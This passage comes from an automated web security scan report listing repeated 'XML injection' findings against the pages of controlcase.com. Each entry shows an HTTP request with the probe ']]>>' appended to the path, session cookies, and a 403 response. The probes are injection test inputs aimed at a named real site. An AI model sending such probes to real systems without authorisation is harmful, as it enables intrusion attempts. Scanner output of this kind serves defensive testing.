User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664508.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.8.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:15:00 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.66. http://controlcase.com/managed_compliance_firewall_reviews.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_firewall_reviews.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_firewall_reviews.html]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664510.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.9.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:15:25 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.67. http://controlcase.com/managed_compliance_int_vulnerability_scan.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_int_vulnerability_scan.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_int_vulnerability_scan.html]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664504.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.5.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:14:31 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.68. http://controlcase.com/managed_compliance_pci_vulnerability_scan.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_pci_vulnerability_scan.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_pci_vulnerability_scan.html]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664501.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.4.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:14:23 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.69. http://controlcase.com/managed_compliance_penetration_test.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_penetration_test.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_penetration_test.html]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=f4764231133ed3c705cc7d27a7b0b2ed; _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664505.1303664485; _pk_ses.3.4216=*; __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.6.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:14:40 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.70. http://controlcase.com/managed_compliance_security_monitoring.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_security_monitoring.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_security_monitoring.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:35 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.71. http://controlcase.com/managed_compliance_services.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_services.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_services.htm]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_id.3.4216=e72cf29c5d1c4bcd.1303664485.1.1303664485.1303664485; _pk_ses.3.4216=*; __utmz=208121856.1303664485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208121856.1998732058.1303664485.1303664485.1303664485.1; __utmc=208121856; __utmb=208121856.1.10.1303664485

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:12:41 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.72. http://controlcase.com/managed_compliance_services.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_services.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_services.php]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:27:13 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.73. http://controlcase.com/managed_compliance_user_reviews.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_user_reviews.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_user_reviews.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:14 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.74. http://controlcase.com/managed_compliance_vrm.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /managed_compliance_vrm.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /managed_compliance_vrm.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:38 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.75. http://controlcase.com/menu/menu.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /menu/menu.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /menu]]>>/menu.css HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:21 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.76. http://controlcase.com/menu/menu.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /menu/menu.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /menu/menu.css]]>> HTTP/1.1
Host: controlcase.com
Proxy-Connection: keep-alive
Referer: http://controlcase.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:30 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.77. http://controlcase.com/merchant_compliance_manager.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /merchant_compliance_manager.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /merchant_compliance_manager.htm]]>> HTTP/1.1
Host: controlcase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://controlcase.com/certification_ei3pa.html
Cookie: PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; _pk_ses.3.4216=*; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmb=208121856.4.10.1303665078; __utmc=208121856; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:18:05 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.78. http://controlcase.com/merchant_compliance_program.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /merchant_compliance_program.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /merchant_compliance_program.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:24:26 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.79. http://controlcase.com/news_pr.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /news_pr.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /news_pr.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:25:18 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.80. http://controlcase.com/notice_legal.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /notice_legal.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /notice_legal.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:27:50 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.81. http://controlcase.com/notice_privacy.htm [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /notice_privacy.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /notice_privacy.htm]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:27:55 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

10.82. http://controlcase.com/pa_certification.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://controlcase.com
Path:   /pa_certification.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pa_certification.html]]>> HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 17:22:18 GMT
Server: Apache/2.0.55 (Win32)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

